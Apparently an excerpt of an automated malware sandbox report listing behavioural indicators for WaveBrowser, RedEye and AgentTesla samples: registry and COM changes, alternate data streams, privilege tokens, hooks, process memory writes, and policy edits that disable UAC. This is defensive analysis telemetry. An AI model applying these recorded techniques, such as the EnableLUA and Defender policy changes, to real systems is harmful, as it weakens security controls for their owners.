Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "182" LogonUI.exe
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{894ADE70-1E5F-4520-A281-CE3BF0309CE6}\NumMethods\ = "11" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WaveBrwsHTM.RLAZ7WW6LBECXB5FCNTU55MY5Y\Application setup.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\NumMethods SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E44DDEE0-3097-499E-9DD5-7D5D5DCC401D}\NumMethods\ = "8" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775}\ = "IGoogleUpdateCore" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{CEF9DF20-AE5B-4A54-B479-9C2AFC1C2683}\NumMethods\ = "16" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{B2083DCC-1D29-45E6-8386-BEE1488D11AA}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{7DFF302B-EA41-49F8-97B1-9413CEF98C68}\ = "IGoogleUpdate3" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{C5E89508-3927-4EF5-A3B3-C479F0D4E36F} SWUpdaterComRegisterShell64.exe Key created 
\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{97518FC7-7CA2-4921-BC40-F4A07E221C1C}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WavesorSWUpdater.CredentialDialogUser\CLSID\ = "{D12748C8-5013-45E2-9A24-2FB7C2EEFB7C}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{CEF9DF20-AE5B-4A54-B479-9C2AFC1C2683}\NumMethods SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E4E159E0-7B9C-4D75-AC11-A80628173DE3}\NumMethods\ = "8" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{B2083DCC-1D29-45E6-8386-BEE1488D11AA}\NumMethods\ = "24" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\NumMethods\ = "17" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{DA4EFC2D-B243-4BA8-8A14-8937D867B699}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{3BE77C6E-0029-4F24-B677-32C9E15CD8F1}\NumMethods\ = "4" SWUpdaterComRegisterShell64.exe Set 
value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{44367D77-92C0-45E8-840D-0C098E650CE8}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{2C53B9D4-A718-4972-B28E-2E7AF1055602}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{1BE9D40C-2307-4213-830E-7E3CE9EDF0C2}\ProgID SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{2B2AD342-8BBC-40AD-AF1B-6887EAB9D3D0} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{44367D77-92C0-45E8-840D-0C098E650CE8}\NumMethods SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{62A51DF2-CCB8-4DD9-9069-34B8461617FC} SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{D3C865DD-E36B-432E-9E47-554925B86737} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{D669BD5D-A9B6-47FD-B558-81508AEF48C4}\NumMethods\ = "4" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{2B2AD342-8BBC-40AD-AF1B-6887EAB9D3D0} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{50363C3E-2FB2-4EC0-A827-CD3314F526C5}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WavesorSWUpdater.PolicyStatusUser\CurVer SWUpdater.exe Key created 
\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E4E159E0-7B9C-4D75-AC11-A80628173DE3}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{DA4EFC2D-B243-4BA8-8A14-8937D867B699}\NumMethods\ = "41" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{3BE77C6E-0029-4F24-B677-32C9E15CD8F1} SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{CFDE680E-8700-4808-BAAF-8B1F50F2CC87}\ = "IPolicyStatusValue" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\ = "IAppWeb" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{DDF98EF0-2728-4A8D-8B0F-32627DC56437} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WavesorSWUpdater.Update3WebUser SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF} SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{7DFF302B-EA41-49F8-97B1-9413CEF98C68} SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{D3C865DD-E36B-432E-9E47-554925B86737}\ = "IJobObserver2" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{730EBDF4-7AD2-4516-BF1A-6C6F28C60CF9}\NumMethods SWUpdater.exe Key created 
\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{64A19E70-BCFF-4808-A320-774FD11571E5}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{2C53B9D4-A718-4972-B28E-2E7AF1055602}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{50363C3E-2FB2-4EC0-A827-CD3314F526C5}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{D669BD5D-A9B6-47FD-B558-81508AEF48C4}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\NumMethods\ = "7" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{2C53B9D4-A718-4972-B28E-2E7AF1055602}\ = "IAppVersion" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44DDEE0-3097-499E-9DD5-7D5D5DCC401D}\NumMethods\ = "8" SWUpdaterComRegisterShell64.exe Set value (str) 
\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WaveBrwsHTM.RLAZ7WW6LBECXB5FCNTU55MY5Y\Application\ApplicationIcon = "C:\\Users\\Admin\\Wavesor Software\\WaveBrowser\\wavebrowser.exe,0" setup.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\.xht setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{64A19E70-BCFF-4808-A320-774FD11571E5}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{CFDE680E-8700-4808-BAAF-8B1F50F2CC87} SWUpdater.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{2B2AD342-8BBC-40AD-AF1B-6887EAB9D3D0}\InprocHandler32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{9CD78CBC-FD21-4FFF-B452-9D792A58B7C4}\LocalServer32\ = "\"C:\\Users\\Admin\\Wavesor Software\\WaveBrowser\\1.5.18.2\\notification_helper.exe\"" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\NumMethods\ = "23" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\NumMethods\ = "23" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WaveBrwsHTM.RLAZ7WW6LBECXB5FCNTU55MY5Y\ = "WaveBrowser HTML Document" setup.exe -
NTFS ADS 8 IoCs
description ioc Process
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 761811.crdownload:SmartScreen msedge.exe
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 267650.crdownload:SmartScreen msedge.exe
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 663595.crdownload:SmartScreen msedge.exe
File created C:\windows.exe\:SmartScreen:$DATA RedEye.exe
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 619532.crdownload:SmartScreen msedge.exe
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 194526.crdownload:SmartScreen msedge.exe
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 595948.crdownload:SmartScreen msedge.exe
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 17363.crdownload:SmartScreen msedge.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process
7144 WINWORD.EXE
7144 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 2976 msedge.exe 2976 msedge.exe 3280 msedge.exe 3280 msedge.exe 4032 identity_helper.exe 4032 identity_helper.exe 3104 msedge.exe 3104 msedge.exe 1936 msedge.exe 1936 msedge.exe 4572 msedge.exe 4572 msedge.exe 4620 msedge.exe 4620 msedge.exe 4620 msedge.exe 4620 msedge.exe 5088 msedge.exe 5088 msedge.exe 4160 msedge.exe 4160 msedge.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 6520 msedge.exe 6520 msedge.exe 7820 wavebrowser.exe 7820 wavebrowser.exe 6596 msedge.exe 6596 msedge.exe 4820 msedge.exe 4820 msedge.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 7708 SWUpdater.exe 7708 SWUpdater.exe 7808 msedge.exe 7808 msedge.exe 3032 RedEye.exe 3032 RedEye.exe 3032 RedEye.exe 6284 RedEye.exe 6284 RedEye.exe 6284 RedEye.exe 6284 RedEye.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process
3280 msedge.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3280 msedge.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3280 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 2352 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2352 AUDIODG.EXE Token: SeDebugPrivilege 1228 Wave Browser.exe Token: SeDebugPrivilege 4552 Wave Browser.exe Token: SeDebugPrivilege 2664 Wave Browser.exe Token: SeDebugPrivilege 4868 SWUpdater.exe Token: SeDebugPrivilege 4868 SWUpdater.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 
wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe Token: SeCreatePagefilePrivilege 3796 wavebrowser.exe Token: SeShutdownPrivilege 3796 wavebrowser.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 3280 msedge.exe 5084 ButterflyOnDesktop.exe 3280 msedge.exe 3280 msedge.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe 3796 wavebrowser.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
pid Process 6608 AgentTesla.exe 7736 AgentTesla.exe 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 7144 WINWORD.EXE 6156 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3280 wrote to memory of 5048 3280 msedge.exe 83 PID 3280 wrote to memory of 5048 3280 msedge.exe 83 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 
msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2580 3280 msedge.exe 84 PID 3280 wrote to memory of 2976 3280 msedge.exe 85 PID 3280 wrote to memory of 2976 3280 msedge.exe 85 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 PID 3280 wrote to memory of 2496 3280 msedge.exe 86 -
System policy modification 1 TTPs 11 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1" | RedEye.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | RedEye.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | RedEye.exe
